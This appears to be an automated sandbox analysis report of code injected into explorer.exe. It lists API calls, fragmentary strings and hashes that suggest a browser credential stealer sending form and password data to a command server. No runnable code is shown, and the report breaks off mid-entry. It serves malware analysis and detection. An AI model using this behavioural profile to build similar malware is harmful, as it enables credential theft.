Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c226379fdb0a4a8fcd403a91d8212deffff49d4d50f3e4ab06e2dcd3de815aa
Instruction ID: 9a4fd97b7c7a073611e0b8dbe12629e420e61cc9c296064de5500b636632d577
Opcode Fuzzy Hash: 2c226379fdb0a4a8fcd403a91d8212deffff49d4d50f3e4ab06e2dcd3de815aa
Instruction Fuzzy Hash: BC90026131544846D150629A8804B0F8109A7E5242F91C029A8546554CCD5588557761

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3452, Parent PID: 6000COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.6%
Total number of Nodes:	457
Total number of Limit Nodes:	18

Executed Functions

Function 100D8F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 100D912E
setsockopt.WS2_32 ref: 100D9830
recv.WS2_32 ref: 100D9859

Strings

nnec, xrefs: 100D932A
&sql, xrefs: 100D9471
ose, xrefs: 100D933F
: cl, xrefs: 100D9338
&br=, xrefs: 100D9509
dat=, xrefs: 100D9290
tion, xrefs: 100D9331
GET , xrefs: 100D9318
&un=, xrefs: 100D94F1
Co, xrefs: 100D9323

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 61629a497fcc3155daa9096da6700adca4ca437e32f8259f1125d465a2882943
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: FC528E34618B488FC759EF68C4847EAB7E2FB55300F51462ED49FC7246DE30A949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100D8232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 100D8449

Strings

`, xrefs: 100D841D

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 2bdc9d96369f93b16e86e8001beb34f57eddeb86a61b1746d95a84406af36c44
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: C5224C70A18B099FCB99DF68C8956AEF7E1FB58301F51022EE45ED3250DB30EA51CB85

Uniqueness

Uniqueness Score: -1.00%

Function 100D9E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 100D9E67

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 4bd378a53492687e96e9a7e7f160b667b9bc8cb5baa94df075d782f50c11c3d7
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 8901B134628B884F8788EFACD48112AB7E4FBCD314F000B3EE99AC3250EB70C5414752

Uniqueness

Uniqueness Score: -1.00%

Function 100D9E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 100D9E67

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 3dea6da0ef71eb3504788102b3450630c06aca71dab3dcc190888c6fc18e4a99
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 8F01A234628B884B8748EB6C94512A6B3E5FBCE314F000B3EE9DAC3241DB21D5024782

Uniqueness

Uniqueness Score: -1.00%

Function 100D38C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 100D39A0

Strings

urlmon.dll, xrefs: 100D3959
User-Agent: , xrefs: 100D3935, 100D3948
nt: , xrefs: 100D391E
on.d, xrefs: 100D3902

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 7136ac166f45d8fa842b505d2e04c8568701d46e609c3fbc086b8f5a222ae2f2
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: CC31D131614B0C8BCB44EFA8C8857EEBBE5FB58205F40422AE54ED7341DF789A45C79A

Uniqueness

Uniqueness Score: -1.00%

Function 100D38BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 100D39A0

Strings

urlmon.dll, xrefs: 100D3959
User-Agent: , xrefs: 100D3935, 100D3948
nt: , xrefs: 100D391E
on.d, xrefs: 100D3902

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 365ce3e9283d3fbe20d72ad87c1fefbdb84c9f13015d9709d320f8e2a2987bc2
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2321E470610B4C8BCB04EFA8C8957EEBBE5FF58205F40422AE45AD7341DF749A45C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 100CFB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 100CFCCA

Strings

el32, xrefs: 100CFBA0
.dll, xrefs: 100CFBCD
kern, xrefs: 100CFB99

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 606add2bf8307e39829bcfc886435424fee7fe32d58de26ab75a2da26205df5e
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 7D415A74918A088FDB84EFA8C8D97AD77E0FB58300F04417AD84EDB256DE349A45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 100CFB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 100CFCCA

Strings

el32, xrefs: 100CFBA0
.dll, xrefs: 100CFBCD
kern, xrefs: 100CFB99

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: faeac99d257b099ce5ee02e827d283383f12ed52bc4e2d4bdb9931abd060c7e6
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 05415A74918A0C8FDB84EFA8C4D97AD77E1FB68300F04417AD84EDB256DE309A45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 100D572E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 100D5791

Strings

ect, xrefs: 100D5761
conn, xrefs: 100D575A

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 02406579529ceba2783a932b81e0354579ba24e5f1ca5fd95e76917ee12a4cf3
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 5F015E30618B188FCB84EF5CE088B55B7E0FB58314F1545AEE90DCB226C674D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 100D5732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 100D5791

Strings

ect, xrefs: 100D5761
conn, xrefs: 100D575A

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 50018aadd6d59334b0dec43a0e4ef77f674b1e376cd18404fd0874c62d25ee58
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: FF012C70618B1C8FCB84EF5CE088B55BBE0FB59315F1545AEA80DCB226CA74C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 100D562C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 100D5691

Strings

tart, xrefs: 100D565A
WSAS, xrefs: 100D5653

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
Instruction ID: 88f2df152bc9a67b58a4f74be6835f93b26dc3248c5081cf27c03cf2e4edbb0b
Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
Instruction Fuzzy Hash: 79018B30518B188FCB44DF1CD048B69FBE0FB58351F2502A9E409CB266C7B0CA428B96

Uniqueness

Uniqueness Score: -1.00%

Function 100D5632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 100D5691

Strings

tart, xrefs: 100D565A
WSAS, xrefs: 100D5653

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: Startup
String ID: WSAS$tart
API String ID: 724789610-2426239465
Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
Instruction ID: 1e7d6f36ca3daf8a7d0552e5de225a9755cc51e7b115a7688712eb8331a51625
Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
Instruction Fuzzy Hash: 66014B70518B188FCB44DF1C9048B69FBE0FB58351F2541A9E40DCB266C7B0C9418B96

Uniqueness

Uniqueness Score: -1.00%

Function 100D56B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 100D5713

Strings

send, xrefs: 100D56DA

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: f3be435f22a66498df92c2f4af11b1c63af10485d1d1cb37485a941a61b94f8e
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 11011270518B188FDB84DF5CE049B25B7E0EB58315F1645AED85DCB366C670D8818B85

Uniqueness

Uniqueness Score: -1.00%

Function 100D55B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 100D5611

Strings

sock, xrefs: 100D55D9

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: fb6f4d38f34af39861b77837aa75d7be4f57896d07d0c28438bb6836334bf995
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 3C012C70618B188FCB84EF5CE048B54BBE0FB59354F1545AEE85ECB366C7B0C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 100CD2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 100CD32D

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: a1e3720d5738eeb6d2755a17ab1150e4d1943dd6c48e98d87b1801f73c1fe06a
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: FB316AB4A14B89DBDB94EF698188399F7A1FB54300F5542BFC91DCA207CB34A650CF92

Uniqueness

Uniqueness Score: -1.00%

Function 100CD412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 100CD461

Memory Dump Source

Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: f8d7d377e5dec696f9d0fb0915244f847023710882cc490afd8daa61ed1f575b
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: E3F04630268B080FD788EF2CD44563AF3D0FBE8210F41063EA58DC3320CA38D5828716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0E16AD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

S, xrefs: 0E16B073
.dll, xrefs: 0E16AF2F
32.d, xrefs: 0E16AF0B
M, xrefs: 0E16B082
kern, xrefs: 0E16AF5A
net., xrefs: 0E16AF44
dll, xrefs: 0E16AF4C
ll, xrefs: 0E16AF13
el32, xrefs: 0E16AF27
wini, xrefs: 0E16AF72
user, xrefs: 0E16AF03

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 3549f206602c6c8262552cd9352b9b11188c5c4db376b4bbab27ccc05d10be45
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 40E15A74618B488FC764EF68C494BABB7E1FB58700F504A2E95EBC7251DF30A981CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E16D792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

form, xrefs: 0E16D84D
guid, xrefs: 0E16D7CE
encr, xrefs: 0E16D89D
ypte, xrefs: 0E16D8A5
Subm, xrefs: 0E16D855
swor, xrefs: 0E16D8EA
ypte, xrefs: 0E16D8DA
d, xrefs: 0E16D8F2
user, xrefs: 0E16D876
e, xrefs: 0E16D8BD
itUR, xrefs: 0E16D85D
name, xrefs: 0E16D87D
Fiel, xrefs: 0E16D884
encr, xrefs: 0E16D8D2
rnam, xrefs: 0E16D8B5
dPas, xrefs: 0E16D8E2
dUse, xrefs: 0E16D8AD

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 5c50be89a90e0b5609f84ad68e1fd4ca6e9b6887db513b538089c72358649c07
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 45B18B30618B488EDB59EF68C485AEEB7F2FF98300F50491ED49AC7251EF709945CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E16B622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

u, xrefs: 0E16B661
2, xrefs: 0E16B674
n, xrefs: 0E16B6BA
d, xrefs: 0E16B67B
e, xrefs: 0E16B66D
i, xrefs: 0E16B69E
w, xrefs: 0E16B6B3
c, xrefs: 0E16B697
s, xrefs: 0E16B689
d, xrefs: 0E16B6A5
p, xrefs: 0E16B690
l, xrefs: 0E16B6AC
t, xrefs: 0E16B6C8
l, xrefs: 0E16B6D6
n, xrefs: 0E16B6C1
d, xrefs: 0E16B6CF
l, xrefs: 0E16B682

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 8cd5b7f18431dc2f2f49872e3bef078720038558ee38363489e98ff1983eb607
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: E5419070A1CB08CFDB14DF88A8556BD7BE6FB48700F00026ED409D7245DBB59D958BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0E172AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

e, xrefs: 0E172CA0
l, xrefs: 0E172C35
[, xrefs: 0E172BF6
n, xrefs: 0E172C98
b, xrefs: 0E172C73
[, xrefs: 0E172C90
], xrefs: 0E172C3D
[, xrefs: 0E172C2D
[, xrefs: 0E172C66
c, xrefs: 0E172C0B
], xrefs: 0E172CA8
l, xrefs: 0E172CE2
[, xrefs: 0E172CCD
D, xrefs: 0E172CDA

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 5b302876b6cf2b83756678597db064ccb1a233f9be01dfad8dc28a5715341527
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 8FC16D70218B088FC758EF68C495ADAF3E5FB98704F404B2E959AC7250DF30A995CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E172F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 0E172F63
r, xrefs: 0E172F88
r, xrefs: 0E172FA0
r, xrefs: 0E172FB0
r, xrefs: 0E172FC0
0, xrefs: 0E172F5B
r, xrefs: 0E172FA8
r, xrefs: 0E172FB8
c, xrefs: 0E172FC8
n, xrefs: 0E172F6B
r, xrefs: 0E172F98
r, xrefs: 0E172F90

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 2ee3aa2247d9270285bf5222255d726b9bcce5708949ae10e50c1dfc56f0016a
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: B551C17121C7488FD719DF18C8816AAB7F5FB85B00F501A2EE8DBC7251DBB49946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0E16C2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

nspr, xrefs: 0E16C4D4
sspi, xrefs: 0E16C320
cli., xrefs: 0E16C327
dll, xrefs: 0E16C32E
opera_browser.dll, xrefs: 0E16C629
l, xrefs: 0E16C4E2
4.dl, xrefs: 0E16C4DB
dragon_s.dll, xrefs: 0E16C614

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 757cc12ab94f40f318616f654e02ae066fef7cbbabb5830fc1c584a36325594b
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 92C1AD70618A198FC758EB68C495AEAF3E5FB98700F90472D849BC7250DF30AE918BC5

Uniqueness

Uniqueness Score: -1.00%

Function 0E16C2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

nspr, xrefs: 0E16C4D4
sspi, xrefs: 0E16C320
cli., xrefs: 0E16C327
dll, xrefs: 0E16C32E
opera_browser.dll, xrefs: 0E16C629
l, xrefs: 0E16C4E2
4.dl, xrefs: 0E16C4DB
dragon_s.dll, xrefs: 0E16C614

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: dc2fd8d4b3c4f3e3116db3139e01a1cd86ca0a758e4983330b0b3a89a36df6e7
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: E8C1AD70618A198FC758EF68C495AAAF3E5FB98700F90472D949FC7250DF30AE918BC5

Uniqueness

Uniqueness Score: -1.00%

Function 0E16DCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

2, xrefs: 0E16DDE1
L: , xrefs: 0E16DD66
name, xrefs: 0E16DDB2
User, xrefs: 0E16DDAB
Pass, xrefs: 0E16DD97
word, xrefs: 0E16DD9E
UR, xrefs: 0E16DD5F

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 3337bcca8168bead5a8b30785ddbe847c388fde18fbe89f0e1c84bcd5f041583
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: E6A1A0706187488FDB18EFA89444BEEB7F2FF84704F40462DD48AD7251EF7099958789

Uniqueness

Uniqueness Score: -1.00%

Function 0E16DCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

2, xrefs: 0E16DDE1
L: , xrefs: 0E16DD66
name, xrefs: 0E16DDB2
User, xrefs: 0E16DDAB
Pass, xrefs: 0E16DD97
word, xrefs: 0E16DD9E
UR, xrefs: 0E16DD5F

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 4a6ce0ba1e2d91a164f1e495a941c99b0ce7611dc94fda9d98e36f023e978404
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
